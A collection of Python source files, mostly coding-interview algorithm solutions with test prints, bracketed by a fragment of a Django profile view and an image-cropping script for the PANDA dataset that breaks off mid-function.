form = UserRegisterForm()
return render(request, 'users/register.html', {"form":form})
@login_required
def profile(request):
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
# messages.success(request, 'Your account has been updated successfuly!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form,
}
return render(request, 'users/profile.html', context)
``` |
{
"source": "JoanWu5/Grokking-the-coding-interview",
"score": 4
} |
#### File: Grokking-the-coding-interview/bitwise XOR/two single numbers.py
```python
def find_two_single_numbers(arr):
n1xn2 = 0
for num in arr:
n1xn2 ^= num
rightmost_set_bit = 1
while rightmost_set_bit & n1xn2 == 0:
rightmost_set_bit <<= 1
num1, num2 = 0, 0
for num in arr:
if num & rightmost_set_bit == 0:
num1 ^= num
else:
num2 ^= num
return [num1, num2]
print(find_two_single_numbers([1, 4, 2, 1, 3, 5, 6, 2, 3, 5]))
print(find_two_single_numbers([2, 1, 3, 2]))
```
#### File: Grokking-the-coding-interview/breadth first search/level order successor.py
```python
first search/level order successor.py
# Given a binary tree and a node, find the level order successor of the given node in the tree.
# The level order successor is the node that appears right after the given node in the level order traversal.
from collections import deque
class TreeNode:
def __init__(self, value) -> None:
self.value = value
self.left = None
self.right = None
def level_order_successor(root, key):
if root is None:
return None
queue = deque()
queue.append(root)
while queue:
current_node = queue.popleft()
if current_node.left:
queue.append(current_node.left)
if current_node.right:
queue.append(current_node.right)
if current_node.value == key:
break
return queue[0].value if queue else None
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(9)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
print(level_order_successor(root, 12))
print(level_order_successor(root, 9))
```
#### File: Grokking-the-coding-interview/cyclic sort/find all missing numbers.py
```python
def find_all_missing_number(arr):
i = 0
while i < len(arr):
temp = arr[i] - 1
if arr[i] != arr[temp]:
arr[i], arr[temp] = arr[temp], arr[i]
else:
i += 1
print(i, arr)
result = []
for i in range(len(arr)):
if arr[i] != i + 1:
result.append(i+1)
return result
print(find_all_missing_number([2, 3, 1, 8, 2, 3, 5, 1]))
```
#### File: Grokking-the-coding-interview/cyclic sort/find the smallest missing positive number.py
```python
def find_the_smallest_missing_positive_number(arr):
i = 0
while i < len(arr):
j = arr[i] - 1
if arr[i] > 0 and arr[i] <= len(arr) and arr[i] != arr[j]:
arr[i], arr[j] = arr[j], arr[i]
else:
i += 1
for i in range(len(arr)):
if arr[i] != i + 1:
return i + 1
return -1
print(find_the_smallest_missing_positive_number([-3, 1, 5, 4, 2]))
print(find_the_smallest_missing_positive_number([3, -2, 0, 1, 2]))
print(find_the_smallest_missing_positive_number([3, 2, 5, 1]))
```
#### File: Grokking-the-coding-interview/depth first search/all paths for a sum.py
```python
class TreeNode:
def __init__(self, value) -> None:
self.value = value
self.left, self.right = None, None
def all_paths_for_a_sum(current_node, sum_value, current_path, all_paths):
if current_node is None:
return
current_path.append(current_node.value)
if current_node.value == sum_value and current_node.left is None and current_node.right is None:
all_paths.append(current_path.copy()) # must use copy, or the array will be empty in the end
else:
all_paths_for_a_sum(current_node.left, sum_value - current_node.value, current_path, all_paths)
all_paths_for_a_sum(current_node.right, sum_value - current_node.value, current_path, all_paths)
current_path.pop()
return
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(4)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
all_paths = []
all_paths_for_a_sum(root, 23, [], all_paths)
print(all_paths)
# follow up :
# Problem 1: Given a binary tree, return all root-to-leaf paths.
# Solution: We can follow a similar approach. We just need to remove the “check for the path sum”.
# Problem 2: Given a binary tree, find the root-to-leaf path with the maximum sum.
# Solution: We need to find the path with the maximum sum.
# As we traverse all paths, we can keep track of the path with the maximum sum.
```
#### File: Grokking-the-coding-interview/depth first search/path with given sequence.py
```python
class TreeNode:
def __init__(self, value) -> None:
self.value = value
self.left, self.right = None, None
def find_path(root, sequence):
if root is None:
return len(sequence) == 0
return find_path_with_sequence(root, sequence, 0)
def find_path_with_sequence(current_node, sequence, sequence_index):
if current_node is None:
return False
if sequence_index >= len(sequence) or current_node.value != sequence[sequence_index]:
return False
if current_node.left is None and current_node.right is None and sequence_index == len(sequence) - 1:
return True
return find_path_with_sequence(current_node.left, sequence, sequence_index + 1) or \
find_path_with_sequence(current_node.right, sequence, sequence_index + 1)
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(9)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
print(find_path(root, [12, 7, 9]))
print(find_path(root, [12, 10, 6]))
```
#### File: Grokking-the-coding-interview/dynamic programming/equal subset sum partition.py
```python
def can_partition(num):
sum_num = sum(num)
if sum_num % 2 != 0:
return False
dp = [[-1 for _ in range(int(sum_num/2) + 1)] for _ in range(len(num))]
return True if can_partition_recursive(dp, num, int(sum_num/2), 0) == 1 else False
def can_partition_recursive(dp, num, sum_num, current_index):
if sum_num == 0:
return 1
n = len(num)
if n == 0 or current_index >= n:
return 0
if dp[current_index][sum_num] == -1:
if num[current_index] <= sum_num:
if can_partition_recursive(dp, num, sum_num - num[current_index], current_index + 1):
dp[current_index][sum_num] = 1
return 1
dp[current_index][sum_num] = can_partition_recursive(dp, num, sum_num, current_index + 1)
return dp[current_index][sum_num]
print(can_partition([1, 2, 3, 4]))
print(can_partition([1, 1, 3, 4, 7]))
print(can_partition([2, 3, 4, 6]))
# bottom-up
# O(N * S) space: O(N * S)
def can_partition_2(num):
sum_num = sum(num)
if sum_num % 2 != 0:
return False
sum_num = int(sum_num/2)
n = len(num)
dp = [[False for _ in range(sum_num + 1)] for _ in range(n)]
for i in range(n):
dp[i][0] = True
for j in range(1, sum_num + 1):
dp[0][j] = num[0] == j
for i in range(1, n):
for j in range(1, sum_num + 1):
if dp[i - 1][j]:
dp[i][j] = dp[i - 1][j]
elif j >= num[i]:
dp[i][j] = dp[i - 1][j - num[i]]
return dp[n - 1][sum_num]
print(can_partition_2([1, 2, 3, 4]))
print(can_partition_2([1, 1, 3, 4, 7]))
print(can_partition_2([2, 3, 4, 6]))
```
#### File: Grokking-the-coding-interview/fast_slow pointers/happy number.py
```python
def happy_number(num):
slow, fast = num, num
while True:
slow = find_next_number(slow)
fast = find_next_number(find_next_number(fast))
if slow == fast:
break
return slow == 1
def find_next_number(num):
next_number = 0
while num > 0:
digit = num % 10
next_number += digit * digit
num = num // 10
return next_number
print(happy_number(23))
print(happy_number(12))
```
#### File: Grokking-the-coding-interview/fast_slow pointers/palindorme linkedlist.py
```python
class Node:
def __init__(self, value, next = None) -> None:
self.value = value
self.next = None
def palindorme_linkedlist(head):
if head is None or head.next is None:
return True
middle = find_middle_of_linkedlist(head)
reversed_second_half = reverse_linkedlist(middle)
pointer1, pointer2 = head, reversed_second_half
while pointer1 is not None and pointer2 is not None:
if pointer1.value != pointer2.value:
break
pointer1 = pointer1.next
pointer2 = pointer2.next
reverse_linkedlist(reversed_second_half)
if pointer1 is None or pointer2 is None:
return True
return False
def reverse_linkedlist(head):
new_header = None
while head is not None:
pointer = head.next
head.next = new_header
new_header = head
head = pointer
return new_header
def find_middle_of_linkedlist(head):
slow, fast = head, head
while fast is not None and fast.next is not None:
slow = slow.next
fast = fast.next.next
return slow
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(2)
head.next.next.next.next = Node(1)
print(palindorme_linkedlist(head))
head.next.next.next.next.next = Node(1)
print(palindorme_linkedlist(head))
head2 = Node(1)
head2.next = Node(2)
head2.next.next = Node(2)
head2.next.next.next = Node(1)
print(palindorme_linkedlist(head2))
```
#### File: Grokking-the-coding-interview/fast_slow pointers/start of linkedlist cycle.py
```python
class Node:
def __init__(self, value, next = None) -> None:
self.value = value
self.next = None
def start_of_linkedlist_cycle(head):
cycle_length = linkedlist_cycle(head)
if cycle_length == 0:
return None
pointer1, pointer2 = head, head
for i in range(cycle_length):
pointer2 = pointer2.next
while pointer1 != pointer2:
pointer1 = pointer1.next
pointer2 = pointer2.next
return pointer1.value
def linkedlist_cycle(head):
slow, fast = head, head
while fast is not None and fast.next is not None:
slow = slow.next
fast = fast.next.next
if slow == fast:
return caculate_linkedlist_cycle(slow)
return 0
def caculate_linkedlist_cycle(pointer):
current = pointer
cycle_length = 0
while True:
current = current.next
cycle_length += 1
if current == pointer:
break
return cycle_length
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(4)
head.next.next.next.next = Node(5)
head.next.next.next.next.next = Node(6)
print(start_of_linkedlist_cycle(head))
head.next.next.next.next.next.next = head.next.next
print(start_of_linkedlist_cycle(head))
```
#### File: Grokking-the-coding-interview/in-place reversal of a linkedlist/reverse alternating k element sub list.py
```python
class Node:
def __init__(self, value, next = None) -> None:
self.value = value
self.next = None
def print_linkedlist(self):
temp = self
while temp is not None:
print(str(temp.value) + "", end = "")
temp = temp.next
print()
def reverse_alternating_k_element_sub_list(head, k):
if head is None or head.next is None or k <= 1:
return head
previous, current = None, head
while True:
last_node_of_previous_part = previous
last_node_of_sub_list = current
next_pointer = None
i = 0
while current is not None and i < k:
next_pointer = current.next
current.next = previous
previous = current
current = next_pointer
i += 1
if last_node_of_previous_part is not None:
last_node_of_previous_part.next = previous
else:
head = previous
last_node_of_sub_list.next = current
i = 0
while current is not None and i < k:
previous = current
current = current.next
i += 1
if current is None:
break
return head
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(4)
head.next.next.next.next = Node(5)
head.next.next.next.next.next = Node(6)
head.next.next.next.next.next.next = Node(7)
head = reverse_alternating_k_element_sub_list(head,3)
head.print_linkedlist()
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(4)
head.next.next.next.next = Node(5)
head.next.next.next.next.next = Node(6)
head.next.next.next.next.next.next = Node(7)
head.next.next.next.next.next.next.next = Node(8)
head = reverse_alternating_k_element_sub_list(head,2)
head.print_linkedlist()
```
#### File: Grokking-the-coding-interview/k way merge/smallest number range.py
```python
from heapq import *
import math
def find_smallest_number_range(lists):
range_start, range_end = 0, math.inf
current_max = -math.inf
minheap = []
for i in range(len(lists)):
heappush(minheap, (lists[i][0], 0, i))
current_max = max(current_max, lists[i][0])
while len(minheap) == len(lists):
num, i, list_index = heappop(minheap)
if range_end - range_start > current_max - num:
range_start = num
range_end = current_max
if i < len(lists[list_index]) - 1:
heappush(minheap, (lists[list_index][i + 1], i + 1, list_index))
current_max = max(current_max, lists[list_index][i + 1])
return [range_start, range_end]
print(find_smallest_number_range([[1, 5, 8], [4, 12], [7, 8, 10]]))
print(find_smallest_number_range([[1, 9], [4, 12], [7, 10, 16]]))
```
#### File: Grokking-the-coding-interview/merge intervals/conflicting appointment.py
```python
def is_conflicting_appointment(arr):
start, end = 0, 1
arr.sort(key = lambda x: x[0])
for i in range(1, len(arr)):
if arr[i-1][end] > arr[i][start]:
return False
return True
print(is_conflicting_appointment([[1,4], [2,5], [7,9]]))
print(is_conflicting_appointment([[6,7], [2,4], [8,12]]))
print(is_conflicting_appointment([[4,5], [2,3], [3,6]]))
# follow up: Given a list of appointments, find all the conflicting appointments.
# Example:
# Appointments: [[4,5], [2,3], [3,6], [5,7], [7,8]]
# Output:
# [4,5] and [3,6] conflict.
# [3,6] and [5,7] conflict.
# O(N^2) space:O(N)
def conflicting_appointment(arr):
start, end = 0, 1
arr.sort(key = lambda x: x[0])
result = []
for i in range(len(arr)):
for j in range(i+1, len(arr)):
if arr[i][end] > arr[j][start]:
result.append([arr[i], arr[j]])
return result
print(conflicting_appointment([[1,4], [2,5], [7,9]]))
print(conflicting_appointment([[6,7], [2,4], [8,12]]))
print(conflicting_appointment([[4,5], [2,3], [3,6]]))
print(conflicting_appointment([[4,5], [2,3], [3,6], [5,7], [7,8]]))
```
#### File: Grokking-the-coding-interview/merge intervals/merge intervals.py
```python
intervals/merge intervals.py
# Given a list of intervals,
# merge all the overlapping intervals to produce a list that has only mutually exclusive intervals.
# Example:
# Intervals: [[1,4], [2,5], [7,9]]
# Output: [[1,5], [7,9]]
# Explanation: Since the first two intervals [1,4] and [2,5] overlap, we merged them into one [1,5].
# O(N) for merge O(NlogN) for sorting -> O(NlogN)
# space:O(N)
class Interval:
def __init__(self, start, end) -> None:
self.start = start
self.end = end
def print_interval(self):
print("[" + str(self.start) + "," + str(self.end) + "]", end='')
def merge_intervals(arr):
intervals = []
for i in arr:
intervals.append(Interval(i[0], i[1]))
if len(intervals) < 2:
return intervals
intervals.sort(key = lambda x: x.start)
merged_intervals = []
start = intervals[0].start
end = intervals[0].end
for i in range(1, len(intervals)):
interval = intervals[i]
if interval.start <= end:
end = max(interval.end, end)
else:
merged_intervals.append(Interval(start, end))
start = interval.start
end = interval.end
merged_intervals.append(Interval(start, end))
return merged_intervals
for i in merge_intervals([[1,4], [2,5], [7,9]]):
i.print_interval()
print()
for i in merge_intervals([[6,7], [2,4], [5,9]]):
i.print_interval()
print()
for i in merge_intervals([[1,4], [2,6], [3,5]]):
i.print_interval()
print()
```
#### File: Grokking-the-coding-interview/merge intervals/minimum meeting room.py
```python
from heapq import *
class Meeting:
def __init__(self, start, end) -> None:
self.start = start
self.end = end
def __lt__(self, other):
return self.end < other.end
def min_meeting_rooms(arr):
meetings = []
for i in arr:
meetings.append(Meeting(i[0], i[1]))
meetings.sort(key = lambda x: x.start)
min_rooms = 0
min_heap = []
for meeting in meetings:
while len(min_heap) > 0 and meeting.start >= min_heap[0].end:
heappop(min_heap)
heappush(min_heap, meeting)
min_rooms = max(min_rooms, len(min_heap))
return min_rooms
print(min_meeting_rooms([[1,4], [2,5], [7,9]]))
print(min_meeting_rooms([[6,7], [2,4], [8,12]]))
print(min_meeting_rooms([[1,4], [2,3], [3,6]]))
print(min_meeting_rooms([[4,5], [2,3], [2,4], [3,5]]))
# follow up :
# Problem 1: Given a list of intervals, find the point where the maximum number of intervals overlap.
# ??? don't know how to solve
# Problem 2: Given a list of intervals representing the arrival and departure times of trains to a train station,
# our goal is to find the minimum number of platforms required for the train station so that no train has to wait.
# Problem 2 is equal to the minimum meeting room
```
#### File: Grokking-the-coding-interview/modified binary search/bitonic array maximum.py
```python
def bitonic_array_maximum(arr):
if len(arr) == 0:
return None
start, end = 0, len(arr) - 1
while start < end:
mid = start + (end - start) // 2
if arr[mid] > arr[mid + 1]:
end = mid
else:
start = mid + 1
return arr[start]
print(bitonic_array_maximum([1, 3, 8, 12, 4, 2]))
print(bitonic_array_maximum([3, 8, 3, 1]))
print(bitonic_array_maximum([8, 3, 1]))
print(bitonic_array_maximum([1, 2, 3, 10]))
```
#### File: Grokking-the-coding-interview/modified binary search/minimum difference element.py
```python
def minimum_difference_element(arr, key):
if len(arr) == 0:
return None
if arr[0] > key:
return arr[0]
if arr[-1] < key:
return arr[-1]
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return arr[mid]
elif arr[mid] < key:
start = mid + 1
else:
end = mid - 1
if arr[start] - key < key - arr[end]:
return arr[start]
else:
return arr[end]
print(minimum_difference_element([4, 6, 10], 7))
print(minimum_difference_element([4, 6, 10], 4))
print(minimum_difference_element([4, 6, 10], 17))
print(minimum_difference_element([1, 3, 8, 10, 15], 12))
```
#### File: Grokking-the-coding-interview/modified binary search/search in a sorted infinite array.py
```python
import math
class ArrayReader:
def __init__(self, arr) -> None:
self.arr = arr
def get(self, index):
if index >= len(self.arr):
return math.inf
return self.arr[index]
def search_in_infinite_array(reader, key):
start, end = 0, 1
while reader.get(end) < key:
new_start = end + 1
end += (end - start + 1) * 2
start = new_start
return binary_search(reader, start, end, key)
def binary_search(reader, start, end, key):
while start <= end:
mid = start + (end - start) // 2
if reader.get(mid) == key:
return mid
elif reader.get(mid) < key:
start = mid + 1
else:
end = mid - 1
return -1
reader = ArrayReader([4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30])
print(search_in_infinite_array(reader, 16))
print(search_in_infinite_array(reader, 11))
reader = ArrayReader([1, 3, 8, 10, 15])
print(search_in_infinite_array(reader, 15))
print(search_in_infinite_array(reader, 200))
```
#### File: Grokking-the-coding-interview/modified binary search/search in rotated array.py
```python
def search_in_rotated_array(arr, key):
if len(arr) == 0:
return -1
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return mid
if arr[start] <= arr[mid]:
if key >= arr[start] and key < arr[mid]:
end = mid - 1
else:
start = mid + 1
else:
if key > arr[mid] and key <= arr[end]:
start = mid + 1
else:
end = mid - 1
return -1
print(search_in_rotated_array([10, 15, 1, 3, 8], 15))
print(search_in_rotated_array([4, 5, 7, 9, 10, -1, 2], 10))
# follow up: How do we search in a sorted and rotated array that also has duplicates?
print(search_in_rotated_array([3, 7, 3, 3, 3], 7))
# best: O(logN) worst:O(N) space:O(1)
def search_in_rotated_duplicate_array(arr, key):
if len(arr) == 0:
return -1
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return mid
if arr[start] == arr[mid] and arr[end] == arr[mid]:
start += 1
end -= 1
if arr[start] <= arr[mid]:
if key >= arr[start] and key < arr[mid]:
end = mid - 1
else:
start = mid + 1
else:
if key > arr[mid] and key <= arr[end]:
start = mid + 1
else:
end = mid - 1
return -1
print(search_in_rotated_duplicate_array([3, 7, 3, 3, 3], 7))
```
#### File: Grokking-the-coding-interview/sliding window/intro.py
```python
def find_average_of_subarrays(subarray, size):
output = []
for i in range(len(subarray)-size+1):
average = sum(subarray[i: i+size])/size
output.append(average)
return output
subarray = [1, 3, 2, 6, -1, 4, 1, 8, 2]
size = 5
print(find_average_of_subarrays(subarray, size))
subarray = [1, 3, 2, 6, -1]
print(find_average_of_subarrays(subarray, size))
subarray = [1, 3, 2, 6]
print(find_average_of_subarrays(subarray, size))
# sliding window
# time complexity: O(N)
def find_average_of_subarrays_2(subarray, size):
output = []
result = sum(subarray[0:size])
output.append(result/size)
for i in range(len(subarray)-size):
result -= subarray[i]
result += subarray[i+size]
output.append(result/size)
return output
subarray = [1, 3, 2, 6, -1, 4, 1, 8, 2]
size = 5
print(find_average_of_subarrays_2(subarray, size))
subarray = [1, 3, 2, 6, -1]
print(find_average_of_subarrays_2(subarray, size))
# mark answer
def find_average_of_subarrays_3(subarray, size):
output = []
windowSum, windowStart = 0, 0
for windowEnd in range(len(subarray)):
windowSum += subarray[windowEnd]
if windowEnd >= size-1: # greater or equal to
output.append(windowSum/size)
windowSum -= subarray[windowStart]
windowStart += 1
return output
subarray = [1, 3, 2, 6, -1, 4, 1, 8, 2]
size = 5
print(find_average_of_subarrays_3(subarray, size))
subarray = [1, 3, 2, 6, -1]
print(find_average_of_subarrays_3(subarray, size))
```
#### File: Grokking-the-coding-interview/sliding window/longest_substring_with_ones_after_replacement.py
```python
def longest_substring_with_ones_after_k_replacement(arr, k):
max_one_repeat_times = 0
result = 0
window_start = 0
for window_end in range(len(arr)):
right_char = arr[window_end]
if right_char == 1:
max_one_repeat_times += 1
if window_end - window_start + 1 - max_one_repeat_times > k:
left_char = arr[window_start]
if left_char == 1:
max_one_repeat_times -= 1
window_start += 1
result = max(result, window_end - window_start + 1)
return result
print(longest_substring_with_ones_after_k_replacement([0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1], 2))
print(longest_substring_with_ones_after_k_replacement([0, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1], 3))
```
#### File: Grokking-the-coding-interview/sliding window/permutation in a string.py
```python
def permutation_in_a_string(str, pattern):
char_pattern = dict()
for char in pattern:
if char not in char_pattern:
char_pattern[char] = 0
char_pattern[char] += 1
window_start = 0
char_frequency = dict()
for window_end in range(len(str)):
right_char = str[window_end]
if right_char not in char_frequency:
char_frequency[right_char] = 0
char_frequency[right_char] += 1
if window_end - window_start + 1 > len(pattern):
left_char = str[window_start]
char_frequency[left_char] -= 1
if char_frequency[left_char] == 0:
del char_frequency[left_char]
window_start += 1
if char_frequency == char_pattern:
return True
return False
print(permutation_in_a_string("oidbcaf", "abc"))
print(permutation_in_a_string("odicf", "dc"))
print(permutation_in_a_string("bcdxabcdy", "bcdyabcdx"))
print(permutation_in_a_string("aaacb", "abc"))
def permutation_in_a_string_2(str, pattern):
window_start, matched = 0, 0
char_frequency = dict()
for char in pattern:
if char not in char_frequency:
char_frequency[char] = 0
char_frequency[char] += 1
for window_end in range(len(str)):
right_char = str[window_end]
if right_char in char_frequency:
char_frequency[right_char] -= 1
if char_frequency[right_char] == 0:
matched += 1
if matched == len(char_frequency):
return True
if window_end >= len(pattern) - 1:
left_char = str[window_start]
window_start += 1
if left_char in char_frequency:
if char_frequency[left_char] == 0:
matched -= 1
char_frequency[left_char] += 1
return False
print(permutation_in_a_string_2("oidbcaf", "abc"))
print(permutation_in_a_string_2("odicf", "dc"))
print(permutation_in_a_string_2("bcdxabcdy", "bcdyabcdx"))
print(permutation_in_a_string_2("aaacb", "abc"))
```
#### File: Grokking-the-coding-interview/subsets/permutations.py
```python
from collections import deque
def permutations(arr):
num_length = len(arr)
result = []
permutations = deque()
permutations.append([])
for current_num in arr:
n = len(permutations)
for _ in range(n):
old_permutation = permutations.popleft()
for j in range(len(old_permutation) + 1):
new_permutataion = list(old_permutation)
new_permutataion.insert(j, current_num)
if len(new_permutataion) == num_length:
result.append(new_permutataion)
else:
permutations.append(new_permutataion)
return result
print(permutations([1, 3, 5]))
def recursive_permutation(arr):
result = []
generate_permutations_recursive(arr, 0, [], result)
return result
def generate_permutations_recursive(arr, index, current_permutation, result):
if index == len(arr):
result.append(current_permutation)
else:
for i in range(len(current_permutation) + 1):
new_permutation = list(current_permutation)
new_permutation.insert(i, arr[index])
generate_permutations_recursive(arr, index + 1, new_permutation, result)
print(recursive_permutation([1, 3, 5]))
```
#### File: Grokking-the-coding-interview/subsets/subsets with duplicates.py
```python
def find_subsets_with_duplicates(arr):
arr.sort()
subsets = []
subsets.append([])
start_index, end_index = 0, 0
for i in range(len(arr)):
start_index = 0
if i > 0 and arr[i] == arr[i - 1]:
start_index = end_index + 1
end_index = len(subsets) - 1
for j in range(start_index, end_index + 1):
subset = list(subsets[j])
subset.append(arr[i])
subsets.append(subset)
return subsets
print(find_subsets_with_duplicates([1, 3, 3]))
print(find_subsets_with_duplicates([1, 5, 5, 3, 3]))
```
#### File: Grokking-the-coding-interview/subsets/unique generalized abbreviations.py
```python
from collections import deque
class Abbrevations:
def __init__(self, str, start, count) -> None:
self.str = str
self.start = start
self.count = count
def unique_generalized_abbrevations(word):
result = []
queue = deque()
queue.append(Abbrevations(list(), 0, 0))
while queue:
ab_word = queue.popleft()
if ab_word.start == len(word):
if ab_word.count != 0:
ab_word.str.append(str(ab_word.count))
result.append(''.join(ab_word.str))
else:
queue.append(Abbrevations(list(ab_word.str), ab_word.start + 1, ab_word.count + 1))
if ab_word.count != 0:
ab_word.str.append(str(ab_word.count))
new_word = list(ab_word.str)
new_word.append(word[ab_word.start])
queue.append(Abbrevations(new_word, ab_word.start + 1, 0))
return result
def unique_generalized_abbrevations_2(word):
result = []
unique_generalized_abbrevations_recursive(word, 0, 0, [], result)
return result
def unique_generalized_abbrevations_recursive(word, start, count, current_str, result):
if start == len(word):
if count != 0:
current_str.append(str(count))
result.append(''.join(current_str))
else:
unique_generalized_abbrevations_recursive(word, start + 1, count + 1, list(current_str), result)
if count != 0:
current_str.append(str(count))
new_word = list(current_str)
new_word.append(word[start])
unique_generalized_abbrevations_recursive(word, start + 1, 0, new_word, result)
print(unique_generalized_abbrevations("BAT"))
print(unique_generalized_abbrevations_2("BAT"))
```
#### File: Grokking-the-coding-interview/top k elements/kth largest number in a stream.py
```python
from heapq import *
class KthlargestStream:
minheap = []
def __init__(self, nums, k) -> None:
self.k = k
for num in nums:
self.add(num)
def add(self, num):
heappush(self.minheap, num)
if len(self.minheap) > self.k:
heappop(self.minheap)
return self.minheap[0]
kthlargestStream = KthlargestStream([3, 1, 5, 12, 2, 11], 4)
print(kthlargestStream.add(6))
print(kthlargestStream.add(13))
print(kthlargestStream.add(4))
```
#### File: Grokking-the-coding-interview/top k elements/rearrange string.py
```python
from heapq import *
def rearrange_string(input_str):
maxheap = []
hashmap = dict()
for char in input_str:
hashmap[char] = hashmap.get(char, 0) + 1
for char, frequency in hashmap.items():
heappush(maxheap, (-frequency, char))
result = []
previous_char, previous_frequency = None, 0
while maxheap:
frequency, char = heappop(maxheap)
if previous_char and -previous_frequency > 0:
heappush(maxheap, (previous_frequency, previous_char))
result.append(char)
previous_char = char
previous_frequency = frequency + 1
if len(result) == len(input_str):
return "".join(result)
else:
return ""
print(rearrange_string("aappp"))
print(rearrange_string("Programming"))
print(rearrange_string("aapa"))
```
#### File: Grokking-the-coding-interview/top k elements/sum of elements.py
```python
k elements/sum of elements.py
# Given an array, find the sum of all numbers between the K1’th and K2’th smallest elements of that array.
# Example:
# Input: [1, 3, 12, 5, 15, 11], and K1=3, K2=6
# Output: 23
# Explanation: The 3rd smallest number is 5 and 6th smallest number 15. The sum of numbers coming
# between 5 and 15 is 23 (11+12).
# O(N * logN) space: O(N)
from heapq import *
def sum_of_elements(nums, k1, k2):
minheap = []
for num in nums:
heappush(minheap, num)
for _ in range(k1):
heappop(minheap)
numsum = 0
for _ in range(k2 - k1 - 1):
numsum += heappop(minheap)
return numsum
print(sum_of_elements([1, 3, 12, 5, 15, 11], 3, 6))
print(sum_of_elements([3, 5, 8, 7], 1, 4))
# to reduce the time complexity
# O(N * logk2) space:O(k2)
def sum_of_elements_2(nums, k1, k2):
maxheap = []
for i in range(len(nums)):
if i < k2 - 1:
heappush(maxheap, -nums[i])
elif nums[i] < -maxheap[0]:
heappop(maxheap)
heappush(maxheap, -nums[i])
numsum = 0
for _ in range(k2 - k1 - 1):
numsum += -heappop(maxheap)
return numsum
print(sum_of_elements_2([1, 3, 12, 5, 15, 11], 3, 6))
print(sum_of_elements_2([3, 5, 8, 7], 1, 4))
```
#### File: Grokking-the-coding-interview/top k elements/top k frequent numbers.py
```python
from heapq import *
class WordFrequency:
def __init__(self, word, frequency) -> None:
self.word = word
self.frequency = frequency
def __lt__(self, other):
return self.frequency < other.frequency
def top_k_frequent_elements(nums, k):
hashmap = dict()
for num in nums:
if num not in hashmap:
hashmap[num] = 1
else:
hashmap[num] += 1
minheap = []
for key, val in hashmap.items():
heappush(minheap, WordFrequency(key, val))
if len(minheap) > k:
heappop(minheap)
result = []
while minheap:
result.append(heappop(minheap).word)
return result
print(top_k_frequent_elements([1, 3, 5, 12, 11, 12, 11], 2))
print(top_k_frequent_elements([5, 12, 11, 3, 11], 2))
``` |
{
"source": "JoanYu/PANDA-Toolkit",
"score": 2
} |
#### File: JoanYu/PANDA-Toolkit/cut_image.py
```python
import __future__
import cv2
import random
import os
import numpy as np
name_length = 6
pwd = os.getcwd()
def get_data(region_size, start_number):
path_images = "/Users/xduyzy/Downloads/PANDA_IMAGE/image_train/"
path_labels = 'image_train/image_annos/'
save_image_path = 'result/images/1/'
save_label_path = 'result/annos/1/'
for image_name in os.listdir(path_images):
label_name = image_name[:-4] + '.txt'
image_path = os.path.join(path_images, image_name)
label_path = os.path.join(path_labels, label_name)
img = cv2.imread(image_path)
label = open(label_path,"r")
lines = label.readlines()
line_record = []
for i in range(len(lines)):
if i in line_record:
continue
line_ = lines[i].strip('\r\n')
strline_ = (((line_.replace('(', '')).replace(')', '')).replace('(', '')).replace(')', '')
strline = strline_.split(",")
x1 = float(strline[0])
y1 = float(strline[1])
width = float(strline[2])
height = float(strline[3])
confidence = int(float(strline[4]))
if confidence != 1:
continue
cate = int(float(strline[5]))
# if cate==0 or cate==11:
# continue
center_x = width/2+x1
center_y = height/2+y1
if width<=3:
continue
if height<=3:
continue
rand_int = float(random.uniform(-region_size[0]//4, region_size[1]//4))
# + rand_int
left = int(center_x - region_size[1]//2 + rand_int)
right = int(center_x + region_size[1]//2 + rand_int)
upper = int(center_y - region_size[0]//2 + rand_int)
bottom = int(center_y + region_size[0]//2 + rand_int)
if left<=0:
left = 1
right = region_size[1]
if right >= img.shape[1]:
left = img.shape[1]-region_size[1]
right = img.shape[1]
if upper<=0:
upper = 1
bottom = region_size[0]
if bottom >= img.shape[0]:
upper = img.shape[0]-region_size[0]
bottom = img.shape[0]
img_region = img[upper:bottom,left:right,:]
label_list = []
for j in range(len(lines)):
line_1 = lines[j].strip('\r\n')
strline_1 = (((line_1.replace('(', '')).replace(')', '')).replace('(', '')).replace(')', '')
strline1 = strline_1.split(",")
x11 = float(strline1[0])
y11 = float(strline1[1])
w = float(strline1[2])
h = float(strline1[3])
confidence1 = int(float(strline1[4]))
if confidence1 != 1:
continue
c = int(float(strline1[5]))
truincation = float(strline1[6])
occlusion = float(strline1[7])
# if c == 0 or c == 11:
# continue
c_x = w/2+x11
c_y = h/2+y11
if w <= 3:
continue
if h <= 3:
continue
tt = 1
if c_x>=left+w*0.2 and c_x<=right-w*0.2 and c_y>=upper+h*0.2 and c_y<=bottom-h*0.2:
b_left = c_x - w/2 - left
b_upper = c_y - h/2 - upper
b_right = c_x + w/2 - left
b_bottom = c_y + h/2 - upper
if b_left <= 0:
b_left = 1
tt = 0
if b_upper <= 0:
b_upper = 1
tt = 0
if b_right >= region_size[1]:
b_right = region_size[1]
tt = 0
if b_bottom >= region_size[0]:
b_bottom = region_size[0]
tt = 0
if tt==1:
line_record.append(j)
b_width = b_right - b_left
b_height = b_bottom - b_upper
